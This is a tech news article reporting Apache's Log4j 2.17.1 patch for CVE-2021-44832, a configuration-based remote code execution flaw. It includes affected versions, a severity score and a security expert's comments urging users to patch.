SECURITY
SECURITY
SECURITY
Apache releases Log4j patch to address new RCE vulnerability
The Apache Software Foundation has released a new patch for Log4j, the Java-based logging utility that has seen vulnerabilities targeted en masse by hackers since Dec. 13.
Log4j 2.17.1, the fifth update this month, addresses a new remote code execution vulnerability found in 2.17.0. CVE-2021-44832 allows an attacker with permission to modify the logging configuration file to construct a malicious configuration that allows for remote code execution. The vulnerability affects all versions of Log4j from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.
The new vulnerability has been fixed by limiting JDNI data source names to the Java protocol in Log4j version 2.17.1 along with patches for earlier releases, 2.12.4 for Java 8 and 2.3.2 for Java 6.
The vulnerability has a Common Vulnerability Scoring System score of 6.6. As researchers at Snyk Ltd. noted today, it’s not as bad as it sounds, although they added that those running Log4j should apply the new patches.
“The Log4j CVE being released today requires a fairly obscure set of conditions to trigger,” Casey Ellis, founder and chief technology officer at crowdsourced security company Bugcrowd Inc., told SiliconANGLE. “So, while it’s important for people to keep an eye out for newly released CVEs for situational awareness, this CVE doesn’t appear to increase the already elevated risk of compromise via Log4j.”
Ellis explained that the vulnerability appears to have been discovered through the use of static code analysis tools in conjunction with manual review/exploit development. “As a logging library, Log4j is inherently flexible in terms of how data can be passed to it — each of these points of interaction is a potential vector for exploitation,” Ellis noted. “Many eyes are currently scouring Log4j, so it’s fairly safe to expect more of this type of vulnerability announcement over the coming weeks. In the interest of staying as up-to-date as possible with Log4j — especially if the configurations required for exploiting CVE-2021-44832 — patching to 2.17.1 is a good idea.”
Image: Apache
A message from John Furrier, co-founder of SiliconANGLE:
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
